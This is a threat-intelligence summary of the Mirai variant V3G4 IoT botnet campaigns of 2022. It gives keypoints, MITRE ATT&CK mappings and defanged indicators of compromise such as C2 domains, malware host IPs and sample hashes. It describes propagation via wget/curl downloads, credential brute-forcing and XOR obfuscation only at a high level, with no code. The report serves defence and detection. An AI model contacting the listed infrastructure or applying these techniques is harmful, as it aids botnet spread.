Mirai Variant V3G4 Targets IoT Devices

Mirai variant V3G4 emerged in 2022, leveraging numerous vulnerabilities to propagate across Linux-based IoT devices and convert them into a botnet capable of DDoS and other attacks. It uses hardcoded C2 domains, XOR-based decryption, string encryption, and a stop list to evade defenses, while downloading bot clients via wget/curl and brute-forcing weak credentials to spread. #Mirai #V3G4 #IoTDevices

Keypoints

Mirai variant V3G4 was observed during July–December 2022 targeting exposed Linux-based IoT devices.
The campaigns exploited 13 vulnerabilities to achieve remote code execution and spread via wget and curl downloading bot clients.
The malware uses a hardcoded C2 domain with a consistent string (8xl9) across campaigns.
V3G4 performs string decryption with multiple XOR rounds and encrypts credentials with XOR, adapting keys per scenario.
A single-instance check and a stop list help avoid duplication and terminate competing processes on the host.
Brute-forcing weak telnet/SSH credentials drives propagation to other devices, while embedded credentials support scanning.

MITRE Techniques

[T1190] Exploit Public-Facing Application – The threat actor exploited 13 vulnerabilities that could lead to remote code execution. Quote: “The threat actor exploited 13 vulnerabilities that could lead to remote code execution.”
[T1105] Ingress Tool Transfer – wget and curl are automatically used to download Mirai bot clients from malware infrastructure. Quote: “wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients.”
[T1110] Brute Force – The V3G4 variant spreads by brute forcing weak username/password combinations on network devices. Quote: “spreads itself through brute forcing network devices’ weak username/password combinations.”
[T1027] Obfuscated/Compressed Data – Strings related to botnet execution and credentials are encrypted with XOR in multiple rounds. Quote: “All the botnet client execution-related strings are decrypted with four rounds of XOR decryption (shown in Figure 7).”
[T1562.001] Impair Defenses – The botnet uses a stop list of target processes to terminate competing software on the host. Quote: “The botnet client searches for and terminates” the stop list.
[T1071.001] Web Protocols – The V3G4 variant connects to a hardcoded C2 domain to receive commands. Quote: “The V3G4 variant tries to connect to its hardcoded C2.”
[T1497.001] Virtualization/Sandbox Evasion – A single-instance check ensures only one botnet process runs, which can function as an anti-analysis/anti-duplication measure. Quote: “only one instance of this malware is executing on the infected device. If a botnet process already exists, the botnet client will simply print a string from the console and exit.”

Indicators of Compromise

[Infrastructure] Malware C2 – comeanalyze.8×19[.]com
[Infrastructure] Malware Host – 176.123.9[.]238, 198.98.49[.]79, and 104.244.72[.]64
[Artifacts] Shell Script Downloader – 0837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b36329, c32f8df3cb019e83e0ac49ab0462c59ec70733c3d516ade011727408751c9d42, and 1 more hashes
[Artifacts] V3G4 Sample – July Campaign – 7bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733, 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03, and 1 more hashes
[Artifacts] V3G4 Sample – September Campaign – 31926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38, eed4690f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b22412e149, and 2 more hashes
[Artifacts] V3G4 Sample – December Campaign – 63ACD589A53BDEC49C624F3CB2FC8319218DF721F486E2F15F3C07ABED97AAE6, 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12, and 2 more hashes